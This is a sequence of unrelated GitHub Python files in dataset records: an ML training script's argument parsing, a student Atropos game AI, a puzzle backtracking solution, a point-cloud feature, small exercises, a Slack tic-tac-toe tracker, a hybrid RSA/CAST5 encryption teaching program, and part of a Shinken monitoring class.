type=str, default='1e0', help=\"lambda_2 in paper\")\n parser.add_argument('--CKB_type', type=str, default='soft', help=\"target soft/hard labels\")\n parser.add_argument('--Tar_Ent_epoch', type=str, default='10', help=\"training with target entropy loss after # epochs\")\n parser.add_argument('--CKB_epoch', type=str, default='5', help=\"training with CKB loss after # epochs\")\n parser.add_argument('--inv_epsilon', type=str, default='1e-2', help=\"regularization parameter of kernel matrix inverse\")\n parser.add_argument('--lr', type=str, default='2e-4', help=\"learning rate\")\n parser.add_argument('--optim_param', type=str, default='Adam', choices=['Adam', 'GD'])\n parser.add_argument('--GPU_device', type=str, nargs='?', default='0', help=\"set GPU device for training\")\n parser.add_argument('--seed', type=str, default='0', help=\"random seed\")\n args = parser.parse_args()\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.GPU_device\n \n config = {}\n 
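# every CLI flag is carried into config as a string; Experiment_Main()\n # re-parses the numeric ones with int()/float()\n 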
config['dataset'] = args.dataset\n config['net'] = args.net\n config['model'] = args.model\n config['FC_dim_1'] = args.FC_dim_1\n config['FC_dim_2'] = args.FC_dim_2\n config['exp_times'] = args.exp_times\n config['epochs'] = args.epochs\n config['batch_size'] = args.batch_size\n config['Tar_Ent_lambda'] = args.Tar_Ent_lambda\n config['CKB_lambda'] = args.CKB_lambda\n config['CKB_type'] = args.CKB_type\n config['Tar_Ent_epoch'] = args.Tar_Ent_epoch\n config['CKB_epoch'] = args.CKB_epoch\n config['inv_epsilon'] = args.inv_epsilon\n config['lr'] = args.lr\n config['optim_param'] = args.optim_param\n config['GPU_device'] = args.GPU_device\n \n ##################################\n # Random Seeds\n ##################################\n torch.manual_seed(int(args.seed)) \n # Run experiments\n Experiment_Main(config)\n","repo_name":"LavieLuo/CKB","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"211120107","text":"# cs440 Programming Assignment 3\n# Atropos Game Playing\n# Jiatong Hao U42186937\n# Xianhui Li U16207086\n# April 25, 2018\n\nimport sys\nimport copy\n# print to stderr for debugging purposes\n# remove all debugging statements before submitting your code\nmsg = \"Given board \" + sys.argv[1] + \"\\n\"\n#sys.stderr.write(msg)\n\n# A node of an n-ary tree that stores the static evaluators\nclass Node :\n def __init__(self, value):\n self.value = value\n self.child = []\n\n#Function to print a tree\ndef printTree(root):\n if root is None:\n return \n \n sys.stderr.write(str(root.value))\n sys.stderr.write(\" \") # Seperator between levels\n queue = []\n for i in range(len(root.child)):\n sys.stderr.write(str(root.child[i].value) + \" \")\n subQueue = []\n for j in range(len(root.child[i].child)):\n subQueue.append(root.child[i].child[j].value)\n queue.append(subQueue)\n sys.stderr.write(\" \") # Seperator between levels\n for i in range(len(queue)):\n sys.stderr.write(\"||\")\n for j in range(len(queue[i])):\n sys.stderr.write(str(queue[i][j])+ \" \")\n\n#covert move = [color, height, left, right] into move_str\ndef move_to_string(move):\n move_str = \"(\" + str(move[0]) + \",\" + str(move[1]) + \",\" + str(move[2]) + \",\" + str(move[3]) + \")\"\n sys.stderr.write(move_str)\n return move_str\n\n\n#convert move = [color, height, left, right] into position in board = [row1, row2, ...]\n#returns a list: [row, col]\ndef move_to_boardpos(move):\n row = -move[1]-1\n col = move[2]\n board_pos = [row, col]\n return board_pos\n\n\n#converts a board_pos to a move\n#board_pos = [i, j]\ndef boardpos_to_move(board_pos, board):\n move = [0]\n move.append(len(board) - board_pos[0] - 1)\n move.append(board_pos[1])\n move.append(len(board[board_pos[0]]) - board_pos[1] - 1)\n return move\n\n\n#if the last move is null, we need to go first\ndef goFirst(board):\n if (len(board) % 2 != 0):\n height = len(board) // 2\n else:\n height = len(board) // 2 - 1\n row_index = len(board) - height - 1\n width = len(board[row_index])\n left = width // 2\n right = width - left - 1\n move1 = [1, height, left, right]\n move2 = [2, height, left, right]\n move3 = [3, height, left, right]\n moves = []\n moves.append(move1)\n moves.append(move2)\n moves.append(move3)\n #our_possible_moves\n return moves\n\n#get the color at a position defined by move[], color is an int\ndef color_at_boardpos(board, move):\n board_pos = move_to_boardpos(move)\n color = 
board[board_pos[0]][board_pos[1]]\n return color\n\n\n#find all empty spots on a board, returns a list of moves with color 0\ndef empty_spots(board):\n empty_spots = []\n for i in range(len(board)):\n for j in range(len(board[i])):\n board_pos = [i, j]\n move = boardpos_to_move(board_pos, board)\n if color_at_boardpos(board, move) == 0:\n empty_spots.append(move)\n return empty_spots\n\n\n#get the six neighbors of a move\ndef find_neighbors(board, move):\n topleft = [0, move[1]+1, move[2]-1, move[3]]\n topright = [0, move[1]+1, move[2], move[3]-1]\n left = [0, move[1], move[2]-1, move[3]+1]\n right = [0, move[1], move[2]+1, move[3]-1]\n if (move[1] == 1):\n bottomleft = [0, move[1]-1, move[2]-1, move[3]]\n bottomright = [0, move[1]-1, move[2], move[3]-1]\n else:\n bottomleft = [0, move[1]-1, move[2], move[3]+1]\n bottomright = [0, move[1]-1, move[2]+1, move[3]]\n\n all_neighbors = [topleft, topright, left, right, bottomleft, bottomright]\n return all_neighbors\n\n#find all empty spot around a move\n#neighbors is a list of list\ndef empty_neighbors(board, neighbors):\n empty_move = []\n for i in range(6):\n if color_at_boardpos(board, neighbors[i]) == 0:\n empty_move.append(neighbors[i])\n #sys.stderr.write(\"bottomright is empty\")\n #sys.stderr.write(str(empty_move))\n return empty_move\n\n#change the color into move[0] \ndef draw_on_board(board, move):\n next_board = copy.deepcopy(board)\n #get board_position\n board_pos = move_to_boardpos(move)\n next_board[board_pos[0]][board_pos[1]] = move[0]\n return next_board\n\n#check if this move will cause to lose the game\ndef will_lose(board, move):\n #get the color of neighbors of move\n current_color = color_at_boardpos(board, move)\n neighbors = find_neighbors(board, move)\n colors = []\n for i in range(6):\n color = color_at_boardpos(board, neighbors[i])\n colors.append(color)\n #sys.stderr.write(\"\\n colors: \" + str(colors))\n #check each triangle\n #upper-left triangle\n lose = False\n if (colors[0] != 0) and (colors[2] != 0):\n if (colors[0] != colors[2]) and (colors[0] != current_color) and (colors[2] != current_color):\n lose = True\n return lose\n #upper-right triangle\n if (colors[1] != 0) and (colors[3] != 0):\n if (colors[1] != colors[3]) and (colors[1] != current_color) and (colors[3] != current_color):\n lose = True\n return lose\n #lower-left triangle\n if (colors[2] != 0) and (colors[4] != 0):\n if (colors[2] != colors[4]) and (colors[2] != current_color) and (colors[4] != current_color):\n lose = True\n return lose\n #lower-right triangle\n if (colors[3] != 0) and (colors[5] != 0):\n if (colors[3] != colors[5]) and (colors[3] != current_color) and (colors[5] != current_color):\n lose = True\n return lose\n #upper triangle\n if (colors[0] != 0) and (colors[1] != 0):\n if (colors[0] != colors[1]) and (colors[0] != current_color) and (colors[1] != current_color):\n lose = True\n return lose\n #lower triangle\n if (colors[4] != 0) and (colors[5] != 0):\n if (colors[4] != colors[5]) and (colors[4] != current_color) and (colors[5] != current_color):\n lose = True\n return lose\n return lose\n\n#count the number of different colored neighboring pairs\ndef different_color_pair(board, move):\n neighbors = find_neighbors(board, move)\n count = 0\n colors = []\n for i in range(6):\n color = color_at_boardpos(board, neighbors[i])\n colors.append(color)\n if (colors[0] != 0) and (colors[1] != 0) and (colors[0] != colors[1]):\n count += 1\n if (colors[1] != 0) and (colors[3] != 0) and (colors[1] != colors[3]):\n count += 1\n if 
(colors[3] != 0) and (colors[5] != 0) and (colors[3] != colors[5]):\n count += 1\n if (colors[5] != 0) and (colors[4] != 0) and (colors[5] != colors[4]):\n count += 1\n if (colors[4] != 0) and (colors[2] != 0) and (colors[4] != colors[2]):\n count += 1\n if (colors[2] != 0) and (colors[0] != 0) and (colors[2] != colors[0]):\n count += 1\n return count * 2\n\n#count how many neighbors has the same color as the opponent's move\ndef same_color_neighbor(board, move):\n #get the color of all neighbors\n neighbors = find_neighbors(board, move)\n count = 0\n colors = []\n for i in range(6):\n color = color_at_boardpos(board, neighbors[i])\n colors.append(color)\n for i in range(6):\n if colors[i] != 0:\n if (move[0] == colors[i]):\n count -= 1\n return count\n\n\n#assign scores to this move according to its surroundings\n#since we are looking two steps away, the static evalution is always for the opponent's situation\ndef static_eval(board, move):\n #if the opponent will lose, high score\n score = 0\n if (will_lose(board, move)):\n score += 10\n\n #if there are few empty places, high score\n neighbors = find_neighbors(board, move)\n if len(empty_neighbors(board, neighbors))<2:\n score += 10\n\n #if there are so many empty places, high score\n if len(empty_neighbors(board, neighbors))>4:\n score += 10\n\n #if different color pairs for the opponent, high score\n different_pairs = different_color_pair(board, move)\n score += different_pairs\n \n #if opponent's move has the same color as its neighbor, low score\n score += same_color_neighbor(board, move)\n return score\n\ndef best_average(node):\n best_average = -100\n index = -1\n for i in range(len(node.child)):\n level_sum = 0\n num_child = 0\n for j in range(len(node.child[i].child)):\n level_sum += node.child[i].child[j].value\n num_child += 1\n level_average = level_sum / num_child\n if level_average > best_average:\n best_average = level_average\n index = i\n return [best_average, index]\n\n#Minimax with alpha-beta pruning\ndef minimax(node, depth, alpha, beta, isMaximizer):\n index = [-1, -1]\n if (depth == 0) or (node.child is None):\n return node.value\n if (isMaximizer):\n node.value = -1000\n for i in range(len(node.child)):\n #for aChild in node.child:\n next_value = minimax(node.child[i], depth-1, alpha, beta, False)[0]\n if (next_value > node.value):\n node.value = next_value\n index[0] = i\n alpha = max(alpha, node.value)\n if (beta <= alpha):\n break\n return [node.value, index]\n else:\n node.value = 1000\n for i in range(len(node.child)):\n node.value = min(node.value, minimax(node.child[i], depth-1, alpha, beta, True))\n beta = min(beta, node.value)\n if (beta <= alpha):\n break\n return [node.value, index]\n\n\nour_possible_moves = []\nnext_boards = []\n#parse the input string, i.e., argv[1]\n#board = [row1, row2, ...], lastmove = [color, height, left, right]\n#get board as a list from input\nboard_start = msg.find(\"[\")\nboard_end = msg.find(\"L\")\nboard_string = msg[board_start:board_end]\nlastboard = []\nfor i in range(len(board_string)):\n if (board_string[i] == \"[\"):\n board_row = []\n elif (board_string[i] == \"]\"):\n lastboard.append(board_row)\n else:\n board_row.append(int(board_string[i]))\n#sys.stderr.write(str(board))\n#get the last move of opponent\nlastmove_start = msg.find(\"(\")\n#if the last move is null, we need to go first\nif lastmove_start == -1:\n sys.stderr.write(\"We go first\")\n our_possible_moves = goFirst(lastboard)\n#get the last move of opponent as a list from input\nelse:\n lastmove_start += 
1\n lastmove_string = msg[lastmove_start:-2]\n sys.stderr.write(lastmove_string)\n lastmove = [int(s) for s in lastmove_string.split(',')]\n\n #needs to look two steps forward, one for ourselves, one for the opponent\n\n #get all possible steps for ourselves\n #find all empty neighbors\n lastmove_empty_neighbors = empty_neighbors(lastboard, find_neighbors(lastboard, lastmove))\n #if there is any empty neighbors, we get all possible next steps\n if (len(lastmove_empty_neighbors) > 0):\n #sys.stderr.write(\"\\n\" + str(lastmove_empty_neighbors))\n for i in range(len(lastmove_empty_neighbors)):\n for j in range(3):\n our_possible_moves.append([j+1, lastmove_empty_neighbors[i][1], lastmove_empty_neighbors[i][2], lastmove_empty_neighbors[i][3]])\n #sys.stderr.write(\"our_possible_moves: \" + str(our_possible_moves) + \"\\n\")\n #find a empty spot to start over\n else:\n empty_spots = empty_spots(lastboard)\n for i in range(len(empty_spots)):\n for j in range(3):\n our_possible_moves.append([j+1, empty_spots[i][1], empty_spots[i][2], empty_spots[i][3]])\n\n sys.stderr.write(\"Need to pick a random spot\")\n\n\n#remove all moves that will lose in our_possible_moves\n#record the board situation after that step\nlose_move = []\nlose_board = []\nfor i in range(len(our_possible_moves)):\n next_board = draw_on_board(lastboard, our_possible_moves[i])\n #sys.stderr.write(str(next_board))\n next_boards.append(next_board)\n if (will_lose(next_board, our_possible_moves[i])):\n lose_move.append(our_possible_moves[i])\n lose_board.append(next_board)\nfor i in range(len(lose_move)):\n #sys.stderr.write(\"remove: \" + str(lose_move[i]))\n our_possible_moves.remove(lose_move[i])\n next_boards.remove(lose_board[i])\n#for i in range(len(our_possible_moves)):\n #sys.stderr.write(\"our move \" + str(i) + \": \" + str(our_possible_moves[i]) + \"\\n\")\n #sys.stderr.write(\"result board \" + str(i) + \": \" + str(next_boards[i]) + \"\\n\")\n#now our_possible_moves contains all possible moves for the next step\n\n#get the possible moves of the opponent at the next, next step\n#if not possible moves for ourselves, we lose, just pick a random position\nif (len(our_possible_moves) == 0):\n sys.stderr.write(\"We lose :(\")\n sys.stdout.write(\"(3,2,2,1)\")\n#get the possible moves of the opponent at the next, next step\n#opponent_moves = [[moves[0], move[3], next_board]]\nelse: \n all_possible_opponent = []\n for i in range(len(our_possible_moves)):\n ourmove_empty_neighbors = empty_neighbors(next_boards[i], find_neighbors(next_boards[i], our_possible_moves[i]))\n #if there are empty spots for the opponent, predict his moves\n if (len(ourmove_empty_neighbors) > 0):\n one_possible_opponent = []\n #get all possible moves of the opponent\n opponent_possible_moves = []\n opponent_boards = []\n for j in range(len(ourmove_empty_neighbors)):\n for k in range(3):\n opponent_possible_moves.append([k+1, ourmove_empty_neighbors[j][1], ourmove_empty_neighbors[j][2], ourmove_empty_neighbors[j][3]])\n one_possible_opponent.append(opponent_possible_moves)\n #get the board situation after each possible moves of the opponent\n for j in range(len(opponent_possible_moves)):\n next_oppo_board = draw_on_board(next_boards[i], opponent_possible_moves[j])\n opponent_boards.append(next_oppo_board)\n one_possible_opponent.append(opponent_boards)\n #sys.stderr.write(\"one_possible_opponent for our move: \" + str(i) + str(one_possible_opponent) + \"\\n\")\n all_possible_opponent.append(one_possible_opponent)\n #else it means that no empty neighbor 
for the opponent\n else:\n #sys.stderr.write(\"No possible moves for the opponent\")\n all_possible_opponent.append([\"no move\"])\n #a move: all_possible_opponent[i][0][j] <-> a board: all_possible_opponent[i][1][j]\n\n\n #compute static score for each all_possible_opponent\n score_tree = Node(0)\n for i in range(len(all_possible_opponent)):\n score_tree.child.append(Node(0))\n #if the opponent has possible moves, evaluate the situation\n if (all_possible_opponent[i] != [\"no move\"]):\n for j in range(len(all_possible_opponent[i][0])):\n #sys.stderr.write(\"opponent possible move for our move \" + str(i) + str(all_possible_opponent[i][0][j]) + \"\\n\")\n #sys.stderr.write(\"opponent possible board for our move \" + str(i) + str(all_possible_opponent[i][1][j]) + \"\\n\")\n #after we move, if the opponent has only one possible move and that leads to losing, we take that step\n if (len(all_possible_opponent[i][0]) == 1) and will_lose(all_possible_opponent[i][1][0], all_possible_opponent[i][0][0]):\n best_move = our_possible_moves[i]\n best_move_string = move_to_string(best_move)\n sys.stdout.write(best_move_string)\n else:\n score = static_eval(all_possible_opponent[i][1][j], all_possible_opponent[i][0][j])\n if (len(all_possible_opponent[i][0]) <= 3):\n score += 3\n score_tree.child[i].child.append(Node(score))\n #else means the opponent needs to find an empty space, give a score of zero\n else:\n sys.stderr.write(\"no move\")\n score = 0\n score_tree.child[i].child.append(Node(score))\n #printTree(score_tree)\n #best_outcome = [best_score, [index[0], index[1]]]\n best_outcome = minimax(score_tree, 2, -1000, +1000, True)\n best_move_index = best_outcome[1][0]\n #best_outcome = best_average(score_tree)\n #best_move_index = best_outcome[1]\n best_move = our_possible_moves[best_move_index]\n best_move_string = move_to_string(best_move)\n sys.stdout.write(best_move_string)\n\n\n","repo_name":"LenkaHao/Introduction-to-AI","sub_path":"Atropos/jthaoPlayer.py","file_name":"jthaoPlayer.py","file_ext":"py","file_size_in_byte":16446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6977479016","text":"# https://www.acmicpc.net/problem/16987\n# Breaking eggs with eggs\nimport sys\ninput = sys.stdin.readline\n\n\ndef backTracking(start):\n global result\n if start == n: # we have considered every egg\n count = 0\n for i in range(n):\n if egg[i][0] <= 0:\n count += 1\n result = max(result, count)\n return\n\n if egg[start][0] <= 0: # this egg is already broken and cannot strike\n backTracking(start + 1)\n return\n\n check = True # check whether every other egg is broken\n for i in range(n):\n if i == start:\n continue\n if egg[i][0] > 0:\n check = False\n break\n\n if check:\n result = max(result, n - 1)\n return\n\n for i in range(n):\n if start != i and egg[i][0] > 0:\n egg[start][0] -= egg[i][1]\n egg[i][0] -= egg[start][1]\n backTracking(start + 1)\n egg[start][0] += egg[i][1]\n egg[i][0] += egg[start][1]\n\n\nn = int(input())\negg = [list(map(int, input().split())) for _ in range(n)]\nresult = 0\n\nbackTracking(0)\nprint(result)\n","repo_name":"youngeun-dev/coding-test-practice","sub_path":"python/16987.py","file_name":"16987.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16985373847","text":"import numpy as np\nfrom features.feature import ScalableFeature\nfrom features.helpers import dist # , mean_dist\n\n#####\n# OBS: must normalize point clouds before saving them to use this feature!\n#####\n\nclass 
kNNMaxDistance(ScalableFeature):\n def run_at_scale(self, scale:float, knn_scale:int):\n labels = np.zeros(self.state.points.shape[0])\n\n for point_i, point in enumerate(self.state.points):\n [_, idx, _] = self.state.kd_tree.search_knn_vector_3d(point, knn_scale + 1)\n labels[point_i] = dist(point, self.state.points[idx[-1]])\n\n labels *= self.state.downsampling_factor\n\n return labels\n \n\n\n\n","repo_name":"appfr3d/TBA4925-Masters-thesis","sub_path":"edge_detection/features/knn_max_distance.py","file_name":"knn_max_distance.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1030109507","text":"# Given two numeric variables A and B, typed in by the user, write an\n# algorithm that swaps the values of the two variables and shows the final\n# value of each (remember how assignment works). \n\nprint(\"Enter the value of A\")\na=int(input())\nprint(\"Enter the value of B\")\nb=int(input())\n\nc=a\na=b\nb=c\nprint(f\"the new value of A is: {a} , and the new value of B is: {b}\")\n\n","repo_name":"wilsonestrada1974/momento1_nuevas_tecnologias","sub_path":"ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3118122568","text":"# container to store data about ongoing games\n# format:\n'''\n channels : {\n\tchannel_id: {\n\t\t'ongoing': BOOLEAN,\n\t\t'players': ARRAY,\n\t\t'winner': STRING,\n\t\t'turn': players[0], // initializing to the first player\n\t\t'board': [\":one:\", \":two:\", \":three:\", \":four:\", \":five:\", \":six:\", \":seven:\", \":eight:\", \":nine:\"]\n\t}\n}\n'''\nchannels = {}\n\n# function to see if a game is ongoing or not\ndef can_start_game(channel):\n\tif channel in channels:\n\t\t# can't start a game if there is one already ongoing in this channel\n\t\tif (channels[channel]['ongoing']):\n\t\t\treturn(False)\n\telse:\n\t\t# if it's the first time a game is getting created in a channel,\n\t\t# initialize an empty dict\n\t\tchannels[channel] = {}\n\treturn(True)\n\ndef start_game(channel, player_one, player_two):\n\t# initializing channel variables when starting the game\n\tchannels[channel]['ongoing'] = True\n\tchannels[channel]['players'] = []\n\tchannels[channel]['players'].append(player_one)\n\tchannels[channel]['players'].append(player_two)\n\tchannels[channel]['winner'] = \"\"\n\tchannels[channel]['turn'] = player_one\n\tchannels[channel]['board'] = [\":one:\", \":two:\", \":three:\", \":four:\", \":five:\", \":six:\", \":seven:\", \":eight:\", \":nine:\"]\n\ndef allowed_to_make_move(channel, player):\n\t# makes sure the user is one of the players in this particular game\n\t# AND it's the user's turn to make a move\n\treturn (player in channels[channel]['players'] and channels[channel]['turn'] == player)","repo_name":"michello/slack-tic-tac-toe","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21486709465","text":"import os\nfrom cryptography.hazmat.primitives.asymmetric import rsa\n# distinct aliases for the two padding modules: asymmetric OAEP padding\n# vs. symmetric block padding (they share the bare name \"padding\")\nfrom cryptography.hazmat.primitives.asymmetric import padding as asym_padding\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives import padding as sym_padding\nfrom cryptography.hazmat.primitives import hashes\nfrom 
cryptography.hazmat.primitives.serialization import load_pem_public_key, load_pem_private_key\n\nsym_key = None\n\n\ndef generation_symmetric_key() -> bytes:\n \"\"\"\n Generates a random symmetric key.\n Returns\n --------\n bytes: the generated symmetric key\n \"\"\"\n key = os.urandom(16)\n return key\n\n\ndef generation_asymmetric_keys() -> None:\n \"\"\"\n Generates an RSA key pair and writes the public and private keys to files\n at the paths entered by the user.\n \"\"\"\n keys = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048\n )\n private_key = keys\n print(type(private_key))\n public_key = keys.public_key()\n print(\"Asymmetric keys created!\\n\")\n path_open_key = input(\"Enter the path for saving the public key to a file: \\n\")\n with open(path_open_key, 'wb') as public_out:\n public_out.write(public_key.public_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo))\n path_close_key = input(\"Enter the path for saving the private key to a file: \\n\")\n with open(path_close_key, 'wb') as private_out:\n private_out.write(private_key.private_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption()))\n print(\"Asymmetric keys written to file!\\n\")\n\n\ndef symmetric_key_encryption(key) -> None:\n \"\"\"\n Encrypts the given symmetric key with the public key read from a file and\n writes the encrypted symmetric key to a file at the specified path.\n \"\"\"\n path_open_key = input(\"Enter the path where the public key is stored: \")\n with open(path_open_key, \"rb\") as pem_in:\n public_bytes = pem_in.read()\n d_public_key = load_pem_public_key(public_bytes)\n print(d_public_key)\n c_key = d_public_key.encrypt(key,\n asym_padding.OAEP(mgf=asym_padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(),\n label=None))\n en_key_path = input(\"Enter the path for saving the encrypted symmetric key to a file: \")\n with open(en_key_path, \"wb\") as f:\n f.write(c_key)\n\n\ndef decryption_of_symmetric_key() -> None:\n \"\"\"\n Reads the encrypted symmetric key from a file and decrypts it with the\n private key.\n \"\"\"\n en_key_path = input(\"Enter the path of the encrypted key: \")\n with open(en_key_path, mode=\"rb\") as f:\n en_text = f.read()\n private_pem = input(\"Enter the path to the private key file: \")\n with open(private_pem, 'rb') as pem_in:\n private_bytes = pem_in.read()\n d_private_key = load_pem_private_key(private_bytes, password=None,)\n dc_key = d_private_key.decrypt(en_text,\n asym_padding.OAEP(mgf=asym_padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(),\n label=None))\n print(\"Decrypted key: \", dc_key)\n\n\ndef set_iv_to_file() -> None:\n \"\"\"\n Generates an initialization vector (IV) for text encryption and decryption\n and saves it to a binary file.\n \"\"\"\n iv = os.urandom(8)\n print(type(iv))\n with open(\"iv.bin\", 'wb') as key_file:\n key_file.write(iv)\n\n\ndef get_iv() -> bytes:\n \"\"\"\n Reads the IV for text encryption and decryption from the file.\n Returns\n --------\n bytes: the stored IV\n \"\"\"\n with open(\"iv.bin\", \"rb\") as f:\n result = f.read()\n return result\n\n\ndef text_encryption(key) -> None:\n \"\"\"\n Reads text from a file, encrypts it, and saves the result to a file at the specified path\n \"\"\"\n text_ = \"\"\n path_text = input(\"Enter the path to the text that should be encrypted\\n\")\n with 
open(path_text, 'r', encoding='utf-8') as f:\n text_ = f.read()\n set_iv_to_file()\n iv = get_iv()\n padder = sym_padding.ANSIX923(1024).padder()\n padded_text = padder.update(bytes(text_, 'utf-8')) + padder.finalize()\n cipher = Cipher(algorithms.CAST5(key), modes.CBC(iv))\n encryptor = cipher.encryptor()\n c_text = encryptor.update(padded_text) + encryptor.finalize()\n print(\"Text encrypted!\")\n save_to_file_text_encryption(c_text)\n\n\ndef text_decryption(key) -> None:\n \"\"\"\n Reads the encrypted text from a file, decrypts it, and saves the result to a file at the specified path.\n \"\"\"\n path_en_text = input(\"Enter the path to the encrypted text: \")\n with open(path_en_text, 'rb') as f:\n en_text = f.read()\n cipher = Cipher(algorithms.CAST5(key), modes.CBC(get_iv()))\n decryptor = cipher.decryptor()\n dc_text = decryptor.update(en_text) + decryptor.finalize()\n unpadder = sym_padding.ANSIX923(1024).unpadder()\n unpadded_dc_text = unpadder.update(dc_text) + unpadder.finalize()\n print(unpadded_dc_text.decode(\"UTF-8\"))\n print(\"Text decrypted!\")\n save_to_file_text_descryption(unpadded_dc_text)\n\n\ndef save_to_file_text_encryption(c_text):\n \"\"\"\n Saves the encrypted text to a file.\n Parameters\n ----------\n c_text: bytes\n the encrypted text\n \"\"\"\n path_text_en = input(\"Enter the path for saving the encrypted text\\n\")\n with open(path_text_en, 'wb') as f_text:\n f_text.write(c_text)\n\n\ndef save_to_file_text_descryption(ds_text):\n \"\"\"\n Saves the decrypted text to a file.\n Parameters\n ----------\n ds_text: str\n the decrypted text\n \"\"\"\n path_text_ds = input(\"Enter the path for saving the decrypted text\\n\")\n with open(path_text_ds, 'w') as f:\n f.write(ds_text.decode(\"UTF_8\"))\n\n\nprint(\"Welcome to the hybrid cryptosystem program.\")\nend_of_the_work = False\nwhile not end_of_the_work:\n choice = int(input('Choose the number of the option you want to apply:\\n1. Generate keys\\n2. Encrypt '\n 'text/key\\n3. Decrypt text/key\\n4. Exit\\n'))\n if choice == 1:\n sym_key = generation_symmetric_key()\n generation_asymmetric_keys()\n print(\"Symmetric key:\", sym_key)\n if choice == 2:\n en_choice = int(input(\"Encrypt:\\n1. Symmetric key\\n2. Text\\n\"))\n if en_choice == 1:\n if sym_key is None:\n print(\"The key cannot be encrypted because it has not been generated!\")\n continue\n else:\n symmetric_key_encryption(sym_key)\n if en_choice == 2:\n if sym_key is None:\n print(\"The text cannot be encrypted because the symmetric key has not been generated!\")\n continue\n else:\n text_encryption(sym_key)\n if choice == 3:\n dc_choice = int(input(\"Decrypt:\\n1. Symmetric key\\n2. Text\\n\"))\n if dc_choice == 1:\n if sym_key is None:\n print(\"The key cannot be decrypted because the symmetric key has not been generated!\")\n continue\n else:\n decryption_of_symmetric_key()\n if dc_choice == 2:\n if sym_key is None:\n print(\"The text cannot be decrypted because the symmetric key has not been generated!\")\n continue\n else:\n text_decryption(sym_key)\n if choice == 4:\n break\n cont = input(\"Continue running the program? 
\")\n if cont == \"да\":\n continue\n if cont == \"нет\":\n end_of_the_work = True\n","repo_name":"RomanShafranyuk/Lab3_ISB","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9685,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28928554201","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport six\nfrom shinken.objects.item import Item, Items\nfrom shinken.autoslots import AutoSlots\nfrom shinken.property import StringProp, ListProp\n\n\nclass ServiceExtInfo(six.with_metaclass(AutoSlots, Item)):\n\n id = 1 # zero is reserved for host (primary node for parents)\n my_type = 'serviceextinfo'\n\n # properties defined by configuration\n # *required: is required in conf\n # *default: default value if no set in conf\n # *pythonize: function to call when transforming string to python object\n # *fill_brok: if set, send to broker. there are two categories:\n # full_status for initial and update status, check_result for check results\n # *no_slots: do not take this property for __slots__\n # Only for the initial call\n # conf_send_preparation: if set, will pass the property to this function. It's used to \"flatten\"\n # some dangerous properties like realms that are too 'linked' to be send like that.\n # brok_transformation: if set, will call the function with the value of the property\n # the major times it will be to flatten the data (like realm_name instead of the realm object).\n properties = Item.properties.copy()\n properties.update({\n 'host_name': StringProp(),\n 'service_description': StringProp(),\n 'notes': StringProp(default=''),\n 'notes_url': StringProp(default=''),\n 'icon_image': StringProp(default=''),\n 'icon_image_alt': StringProp(default=''),\n })\n\n # Hosts macros and prop that give the information\n # the prop can be callable or not\n macros = {\n 'SERVICEDESC': 'service_description',\n 'SERVICEACTIONURL': 'action_url',\n 'SERVICENOTESURL': 'notes_url',\n 'SERVICENOTES': 'notes'\n }\n\n#######\n# __ _ _ _\n# / _(_) | | (_)\n# ___ ___ _ __ | |_ _ __ _ _ _ _ __ __ _| |_ _ ___ _ __\n# / __/ _ \\| '_ \\| _| |/ _` | | | | '__/ _` | __| |/ _ \\| '_ \\\n# | (_| (_) | | | | | | | (_| | |_| | | | (_| | |_| | (_) | | | |\n# \\___\\___/|_| |_|_| |_|\\__, |\\__,_|_| \\__,_|\\__|_|\\___/|_| |_|\n# __/ |\n# |___/\n######\n\n\n # Check is required prop are set:\n # host_name is needed\n def is_correct(self):\n state = True\n cls = self.__class__\n\n return state\n\n # For get a nice name\n def get_name(self):\n if not self.is_tpl():\n try:\n return self.host_name\n except AttributeError: # outch, no hostname\n return 'UNNAMEDHOST'\n else:\n try:\n return self.name\n except AttributeError: # outch, no name for this template\n return 'UNNAMEDHOSTTEMPLATE'\n\n # For debugging purpose only\n def get_dbg_name(self):\n return self.host_name\n\n # Same but for clean call, no debug\n def get_full_name(self):\n return self.host_name\n\n\n# Class for the hosts lists. 
